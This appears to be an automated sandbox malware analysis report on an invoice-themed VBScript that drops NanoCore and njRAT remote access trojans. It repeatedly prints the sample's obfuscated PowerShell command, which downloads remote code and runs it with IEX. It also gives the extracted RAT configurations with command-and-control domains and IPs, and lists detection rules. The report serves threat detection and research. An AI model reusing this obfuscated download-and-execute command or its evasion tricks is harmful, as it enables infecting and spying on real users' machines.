Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3G1J49A6V_Invoice.vbs

Overview

General Information

Sample Name:3G1J49A6V_Invoice.vbs
Analysis ID:458883
MD5:2da417ae523148f7d65220a2c44d1a0a
SHA1:7173fc941d4c051cf4bf5b1eac46aa33f2e6b798
SHA256:c3ddf55e53888193522a7b619370b746cb0a79502c5157a98754a9009f644a11
Tags:vbs
Infos:

Most interesting Screenshot:

Detection

Nanocore Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Nanocore RAT
Yara detected Njrat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Obfuscated command line found
Sigma detected: Suspicious PowerShell Command Line
Uses dynamic DNS services
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6628 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6756 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX'); MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • aspnet_compiler.exe (PID: 6900 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 6664 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
      • aspnet_compiler.exe (PID: 5596 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 17CC69238395DF61AAF483BCEF02E7C9)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "401b59fa-a7f2-4468-a03b-04e3bc48", "Group": "NEW JAN", "Domain1": "newjan.duckdns.org", "Domain2": "newjan.duckdns.org", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Threatname: Njrat

{"Install Dir": "Windows", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HacKed", "Version": "v4.0", "Network Seprator": "|-F-|", "Host": "https://gro.sndkcud.armognad"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20210803\PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txtJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.652005586.000002534BC55000.00000004.00000040.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x51f2:$s1: POWERsHELL
    00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0x55cff:$a: NanoCore
    • 0x55de9:$a: NanoCore
    • 0x56c60:$a: NanoCore
    • 0x5fe0a:$a: NanoCore
    • 0x5fe6b:$a: NanoCore
    • 0x5feae:$a: NanoCore
    • 0x5feee:$a: NanoCore
    • 0x6012a:$a: NanoCore
    • 0x601ca:$a: NanoCore
    • 0x609a2:$a: NanoCore
    • 0x60f95:$a: NanoCore
    • 0x610e6:$a: NanoCore
    • 0x61f40:$a: NanoCore
    • 0x621a7:$a: NanoCore
    • 0x621bc:$a: NanoCore
    • 0x621db:$a: NanoCore
    • 0x6b0de:$a: NanoCore
    • 0x6b107:$a: NanoCore
    • 0x76e80:$a: NanoCore
    • 0x76ea9:$a: NanoCore
    • 0x9bd6c:$a: NanoCore
    00000001.00000003.651067855.000002534BC5B000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
    • 0x15a0:$s1: POWERsHELL
    00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xff8d:$x1: NanoCore.ClientPluginHost
      • 0xffca:$x2: IClientNetworkHost
      • 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      Click to see the 11 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1a53c:$x1: NanoCore.ClientPluginHost
      • 0x2997c:$x1: NanoCore.ClientPluginHost
      • 0x1a556:$x2: IClientNetworkHost
      • 0x299b9:$x2: IClientNetworkHost
      20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x1a53c:$x2: NanoCore.ClientPluginHost
      • 0x2997c:$x2: NanoCore.ClientPluginHost
      • 0x1d879:$s4: PipeCreated
      • 0x2cdcf:$s4: PipeCreated
      • 0x1a529:$s5: IClientLoggingHost
      • 0x299a6:$s5: IClientLoggingHost
      20.2.aspnet_compiler.exe.3b6873f.11.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x39eb:$x1: NanoCore.ClientPluginHost
      • 0xe9c8:$x1: NanoCore.ClientPluginHost
      • 0x1a76a:$x1: NanoCore.ClientPluginHost
      • 0x3f66e:$x1: NanoCore.ClientPluginHost
      • 0x4eaae:$x1: NanoCore.ClientPluginHost
      • 0x3a24:$x2: IClientNetworkHost
      • 0xe9e2:$x2: IClientNetworkHost
      • 0x1a784:$x2: IClientNetworkHost
      • 0x3f688:$x2: IClientNetworkHost
      • 0x4eaeb:$x2: IClientNetworkHost
      20.2.aspnet_compiler.exe.3b6873f.11.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x39eb:$x2: NanoCore.ClientPluginHost
      • 0xe9c8:$x2: NanoCore.ClientPluginHost
      • 0x1a76a:$x2: NanoCore.ClientPluginHost
      • 0x3f66e:$x2: NanoCore.ClientPluginHost
      • 0x4eaae:$x2: NanoCore.ClientPluginHost
      • 0x3b36:$s4: PipeCreated
      • 0xf9fd:$s4: PipeCreated
      • 0x1c515:$s4: PipeCreated
      • 0x429ab:$s4: PipeCreated
      • 0x51f01:$s4: PipeCreated
      • 0x3a05:$s5: IClientLoggingHost
      • 0xe9b5:$s5: IClientLoggingHost
      • 0x1a757:$s5: IClientLoggingHost
      • 0x3f65b:$s5: IClientLoggingHost
      • 0x4ead8:$s5: IClientLoggingHost
      20.2.aspnet_compiler.exe.3b6873f.11.raw.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0x36cb:$a: NanoCore
      • 0x372c:$a: NanoCore
      • 0x376f:$a: NanoCore
      • 0x37af:$a: NanoCore
      • 0x39eb:$a: NanoCore
      • 0x3a8b:$a: NanoCore
      • 0x4263:$a: NanoCore
      • 0x4856:$a: NanoCore
      • 0x49a7:$a: NanoCore
      • 0x5801:$a: NanoCore
      • 0x5a68:$a: NanoCore
      • 0x5a7d:$a: NanoCore
      • 0x5a9c:$a: NanoCore
      • 0xe99f:$a: NanoCore
      • 0xe9c8:$a: NanoCore
      • 0x1a741:$a: NanoCore
      • 0x1a76a:$a: NanoCore
      • 0x3f62d:$a: NanoCore
      • 0x3f645:$a: NanoCore
      • 0x3f66e:$a: NanoCore
      • 0x4ea71:$a: NanoCore
      Click to see the 69 entries

      Sigma Overview

      AV Detection:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      E-Banking Fraud:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      System Summary:

      barindex
      Sigma detected: Suspicious PowerShell Command LineShow sources
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6756
      Sigma detected: Non Interactive PowerShellShow sources
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3G1J49A6V_Invoice.vbs', ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TRUMP ='https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt';$B ='ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');&('I'+'EX')($A -Join '')|&('I'+'EX');, ProcessId: 6756

      Stealing of Sensitive Information:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Remote Access Functionality:

      barindex
      Sigma detected: NanoCoreShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ProcessId: 7072, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "401b59fa-a7f2-4468-a03b-04e3bc48", "Group": "NEW JAN", "Domain1": "newjan.duckdns.org", "Domain2": "newjan.duckdns.org", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
      Source: 22.2.aspnet_compiler.exe.400000.0.unpackMalware Configuration Extractor: Njrat {"Install Dir": "Windows", "Registry Value": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Campaign ID": "HacKed", "Version": "v4.0", "Network Seprator": "|-F-|", "Host": "https://gro.sndkcud.armognad"}
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR
      Yara detected NjratShow sources
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR
      Source: 22.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen7
      Source: 20.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
      Source: 20.2.aspnet_compiler.exe.3828a18.7.unpackAvira: Label: TR/NanoCore.fadte
      Source: unknownHTTPS traffic detected: 207.241.227.125:443 -> 192.168.2.4:49746 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 207.241.228.148:443 -> 192.168.2.4:49756 version: TLS 1.0
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\MyNanoCore RemoteScripting\MyClientPlugin\obj\Debug\MyClientPluginNew.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbt_{& source: powershell.exe, 00000003.00000003.971380287.000001EA40435000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: aspnet_compiler.exe, 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp
      Source: Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmp
      Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: aspnet_compiler.exe, 00000014.00000002.1178170237.0000000003C41000.00000004.00000001.sdmp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49776 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49777 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49778 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49779 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49780 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49781 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49782 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49783 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49784 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49785 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49786 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49787 -> 185.244.30.23:6700
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.4:49789 -> 185.244.30.23:6700
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: newjan.duckdns.org
      Source: Malware configuration extractorURLs: https://gro.sndkcud.armognad
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: dangomra.duckdns.org
      Source: unknownDNS query: name: newjan.duckdns.org
      Source: global trafficTCP traffic: 192.168.2.4:49776 -> 185.244.30.23:6700
      Source: Joe Sandbox ViewIP Address: 207.241.227.125 207.241.227.125
      Source: Joe Sandbox ViewIP Address: 207.241.228.148 207.241.228.148
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: unknownHTTPS traffic detected: 207.241.227.125:443 -> 192.168.2.4:49746 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 207.241.228.148:443 -> 192.168.2.4:49756 version: TLS 1.0
      Source: unknownDNS traffic detected: queries for: ia601405.us.archive.org
      Source: powershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.
      Source: powershell.exe, 00000003.00000003.971057099.000001EA3FEC1000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.repo
      Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
      Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
      Source: aspnet_compiler.exe, 00000014.00000002.1178034772.0000000003B0C000.00000004.00000001.sdmpString found in binary or memory: http://google.com
      Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
      Source: aspnet_compiler.exe, 00000016.00000002.1173461884.0000000002C61000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000003.00000003.970944930.000001EA40440000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
      Source: powershell.exe, 00000003.00000003.669481789.000001EA294EC000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
      Source: aspnet_compiler.exe, 00000016.00000002.1171008020.0000000000402000.00000040.00000001.sdmp, aspnet_compiler.exe, 00000016.00000002.1173461884.0000000002C61000.00000004.00000001.sdmpString found in binary or memory: https://gro.sndkcud.armognad
      Source: PowerShell_transcript.301389.iaYgJ3Zj.20210803203913.txt.3.drString found in binary or memory: https://ia601405.us.archive.org/30/items/all_20210803_20210803/ALL.txt
      Source: Run.vbs.3.drString found in binary or memory: https://ia801408.us.archive.org/20/items/server_202108/Server.txt
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: aspnet_compiler.exe, 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.382d041.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3828a18.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 20.2.aspnet_compiler.exe.3814575.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000014.00000002.1175964065.0000000003813000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1170915770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173629355.00000000027C1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000014.00000002.1173893063.000000000282D000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7072, type: MEMORYSTR
      Yara detected NjratShow sources
      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5596, type: MEMORYSTR

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 20.3.aspnet_compiler.exe.3c78ad1.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 20.2.aspnet_compiler.exe.3b6873f.11.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
      Source: 22.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
      Source: 20.2.aspnet_compiler.exe.3c5399f.15.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
